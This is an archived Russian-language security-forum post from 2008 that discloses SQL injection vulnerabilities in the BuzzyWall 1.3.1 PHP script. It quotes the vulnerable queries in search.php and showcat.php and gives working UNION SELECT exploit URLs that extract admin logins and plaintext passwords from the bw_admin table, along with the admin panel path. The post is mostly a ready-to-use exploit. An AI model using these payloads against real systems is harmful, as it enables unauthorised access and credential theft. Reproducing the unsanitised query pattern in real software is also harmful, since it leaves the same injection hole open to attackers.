ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
BuzzyWall <= 1.3.1 SQL Injection |

22.09.2008, 20:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
BuzzyWall <= 1.3.1 SQL Injection
Офф.сайт: www.buzzscripts.com
Стоймость: 40$
Release date: 22.08.2008
Префикс таблиц бд: bw_
Табличка: bw_admin
Клонки: login,password
Алгоритм шифрования: нету его(т.е в открытом виде)
Админка: http://localhost/admin.php
Сценарий search.php
Уязвимый код:
PHP код:
$q = "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%';";
...
$qry = "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%' LIMIT $from, $max_results;";
Параметр search передаёться, как есть, без какой либо фильтрации. Что даёт нам выполнить произвольный SQL-зпрос.
Необходимо: magic_quotes_gpc = Off
Эксплойт:
Код:
http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
Сценарий showcat.php
Уязвимый код:
Код:
$query = mysql_query("SELECT * FROM bw_main WHERE wp_link_cat='".urldecode($_GET['cat'])."' AND wp_status = 1;");
Необходимо: magic_quotes_gpc = Off
Эксплойт:
Код:
http://localhost/[installdir]/showcat.php?cat=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
http://milw0rm.com/exploits/6527 (c) ~!Dok_tOR!~
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|